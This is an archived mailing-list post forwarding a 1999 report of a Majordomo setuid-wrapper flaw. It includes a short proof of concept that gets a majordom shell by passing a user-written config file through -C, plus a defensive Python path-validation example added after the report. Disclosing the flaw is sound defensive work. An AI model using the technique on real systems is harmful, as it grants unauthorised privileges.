While browsing the majordomo lists trying to find out if anyone is taking care of this issue, I came across another that's in their archive (appended below). The comment of Dave Wolfe was that you shouldn't let untrusted users run programs on his majordomo server.

Olaf
-- 
Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
okirat_private     |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
okirat_private     +-------------------- Why Not?! -----------------------
 UNIX, n.: Spanish manufacturer of fire extinguishers.

[Attached message: cf-flaw]

Date: Thu, 2 Dec 1999 22:00:48 +0000 (GMT)
From: Shevek <shevekat_private>
To: majordomo-workersat_private
Subject: $cf Security flaw

I can get majordomo privileges as a user.
  shevek@tirin ~$ cat foo.pl
  system("/bin/csh");
  shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
  %
  % whoami
  majordom

  root@tirin /usr/local/majordomo# ls -ld .
  drwxr-x--x   6 majordom daemon       1024 Dec  2 21:49 ./
  root@tirin /usr/local/majordomo# ls -l wrapper
  -rwsr-xr-x   1 root     daemon       6630 Jul 12 11:21 wrapper*

The lines in Majordomo (I found the bug by simple inspection, it's also in resend):

  # Config file comes from the environment, -C, or the default path;
  # nothing below checks who owns it or where it lives.
  $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";

  while ($ARGV[0]) {
      # parse for config file or default list
      if ($ARGV[0] =~ /^-C$/i) {        # sendmail v8 clobbers case
          $cf = $ARGV[1];
          shift(@ARGV); shift(@ARGV);
      } elsif ($ARGV[0] eq "-l") {
          $deflist = $ARGV[1];
          shift(@ARGV); shift(@ARGV);
      } else {
          die "Unknown argument $ARGV[0]\n";
      }
  }

  if (! -r $cf) {
      die("$cf not readable; stopped");
  }
  # The config file is Perl: this executes whatever $cf contains
  # with the privileges the setuid wrapper handed us.
  require "$cf";

Am I doing something wrong, or is this a general flaw? Can I simply disable all the possible methods of setting $cf without breaking other things? I haven't had time to inspect the system at any length, I just glanced at it.

I am not on any greatcircle mailing lists, I would appreciate replies to my own address if there is discussion on this subject.

Majordomo version 1.94.4
Perl 5.005_03

Ta.

S.

-- 
Shevek
GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+ US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+ t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y? Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.
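The report above shows the whole problem in two lines: the setuid wrapper lets any local user choose $cf, and `require "$cf"` executes that file as the majordom user after checking only that it is readable. The example below is an added illustration, not code from either message or from Majordomo; it re-implements the same argument walk in Python and then applies the check the original lacks before the file would be loaded: the config must be a regular file (not a symlink) sitting directly under an allowed directory, owned by a trusted uid, and not writable by group or other. The function names, the allowed-directory list and the temporary files built in `demo()` are all assumptions made for this example.

```python
import os
import stat
import tempfile


def select_config(argv, env, default="/etc/majordomo.cf"):
    """Same precedence as the Perl loop: MAJORDOMO_CF, then -C, then default.

    Returns (config_path, default_list). Like the original it accepts
    whatever path the caller supplies; the trust decision is made separately.
    """
    cf = env.get("MAJORDOMO_CF") or default
    deflist = None
    args = list(argv)
    while args:
        if args[0].lower() == "-c":          # sendmail v8 clobbers case
            cf = args[1]
            del args[:2]
        elif args[0] == "-l":
            deflist = args[1]
            del args[:2]
        else:
            raise ValueError("Unknown argument %s" % args[0])
    return cf, deflist


def config_path_is_trusted(path, allowed_dirs, trusted_uids):
    """Return True only if `path` is a config a privileged program may load.

    This is the check missing before `require "$cf"`: `-r $cf` says the file
    is readable, not that an untrusted user could not have written it.
    """
    try:
        st = os.lstat(path)              # lstat: do not follow a symlink
    except OSError:
        return False
    if stat.S_ISLNK(st.st_mode):         # a link can point anywhere the caller likes
        return False
    if not stat.S_ISREG(st.st_mode):
        return False
    real = os.path.realpath(path)        # resolves symlinked parent directories
    allowed = {os.path.realpath(d) for d in allowed_dirs}
    if os.path.dirname(real) not in allowed:
        return False
    if st.st_uid not in trusted_uids:
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):   # anyone else could edit it
        return False
    return True


def load_config_path(argv, env, allowed_dirs, trusted_uids):
    """Hardened front end: pick the config exactly as Majordomo does, then
    refuse to go on unless it passes the trust check. Raises PermissionError
    instead of executing the file."""
    cf, deflist = select_config(argv, env)
    if not config_path_is_trusted(cf, allowed_dirs, trusted_uids):
        raise PermissionError("%s is not a trusted config file" % cf)
    return cf, deflist


def demo():
    """Constructed scenario (not from the report): a trusted config directory
    holding a good file, a world-writable file and a symlink that escapes the
    directory, plus an attacker-owned file outside it, as in foo.pl above."""
    base = tempfile.mkdtemp()
    etc = os.path.join(base, "etc")
    home = os.path.join(base, "home")
    os.mkdir(etc)
    os.mkdir(home)
    good = os.path.join(etc, "majordomo.cf")
    loose = os.path.join(etc, "loose.cf")
    evil = os.path.join(home, "foo.pl")
    link = os.path.join(etc, "link.cf")
    for p in (good, loose, evil):
        with open(p, "w") as f:
            f.write("# constructed sample config\n")
    os.chmod(good, 0o644)
    os.chmod(loose, 0o666)
    os.chmod(evil, 0o644)
    os.symlink(evil, link)
    me = {os.getuid()}                   # stands in for root/majordom here
    return {
        "good": config_path_is_trusted(good, [etc], me),
        "loose": config_path_is_trusted(loose, [etc], me),
        "evil": config_path_is_trusted(evil, [etc], me),
        "link": config_path_is_trusted(link, [etc], me),
    }


if __name__ == "__main__":
    print(demo())
```

Note that this does not by itself close the hole in a setuid program: MAJORDOMO_CF still comes from the caller's environment, so a real wrapper should also drop or sanitise the environment, and the allowed directory itself must not be writable by untrusted users, or an attacker simply creates a fresh file there.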
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:24:18 PDT